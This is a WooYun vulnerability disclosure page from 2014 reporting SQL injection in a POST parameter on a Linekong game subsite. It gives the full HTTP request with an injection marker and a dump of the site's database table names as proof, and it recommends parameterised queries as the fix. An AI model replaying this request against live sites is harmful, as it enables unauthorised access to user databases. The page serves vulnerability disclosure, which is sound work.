当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078554

漏洞标题:蓝港某分站POST注入一枚

相关厂商:linekong.com

漏洞作者: Eoh

提交时间:2014-10-10 14:50

修复时间:2014-10-15 14:52

公开时间:2014-10-15 14:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-10: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

未对用户输入正确执行危险字符清理

详细说明:

存在问题参数ghId
POST /activity/clan3/_do_getPlayerList.ajax.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ms.linekong.com
Cookie: PHPSESSID=oon708apra935clk8l8a78cck0
Host: ms.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ghId=*&page=1


漏洞证明:

sqli_banner.jpg


Database: ms_web                                                                                                                                                                                                  
[57 tables]
+---------------------------------------+
| ms_activity_17173                     |
| ms_activity_aprilpromotion_gift       |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register   |
| ms_activity_clan2_gh                  |
| ms_activity_clan2_join_log            |
| ms_activity_clan3_gh                  |
| ms_activity_clan3_join_log            |
| ms_activity_clan3_survey              |
| ms_activity_clan_gh                   |
| ms_activity_clan_join_log             |
| ms_activity_gh_member                 |
| ms_activity_jh_lottery                |
| ms_activity_jh_survey                 |
| ms_activity_laborday                  |
| ms_activity_name2_log                 |
| ms_activity_name3_log                 |
| ms_activity_name_log                  |
| ms_activity_signin_log                |
| ms_activity_spread                    |
| ms_activity_spread_log                |
| ms_activity_surveyjh_code             |
| ms_activity_surveyjh_log              |
| ms_activity_surveyjh_option           |
| ms_activity_surveyjh_votes            |
| ms_activity_voting_log                |
| ms_address                            |
| ms_article                            |
| ms_article_inserl                     |
| ms_build                              |
| ms_channel                            |
| ms_columns                            |
| ms_comment                            |
| ms_download                           |
| ms_editors_inserl                     |
| ms_flash                              |
| ms_grading                            |
| ms_group                              |
| ms_image                              |
| ms_image_inserl                       |
| ms_lottery_YYexchange                 |
| ms_lottery_exchange                   |
| ms_member                             |
| ms_pass_card_list                     |
| ms_pass_card_list_log                 |
| ms_passportstat                       |
| ms_sort                               |
| ms_template                           |
| ms_url                                |
| ms_url_inserl                         |
| ms_vote                               |
| ms_vote_inserl                        |
| ms_vote_option                        |
| ms_wj_article                         |
| ms_wj_article_inserl                  |
| ms_wj_image                           |
| ms_wj_image_inserl                    |
+---------------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-15 14:52

厂商回复:

最新状态:

暂无

漏洞评价:

评论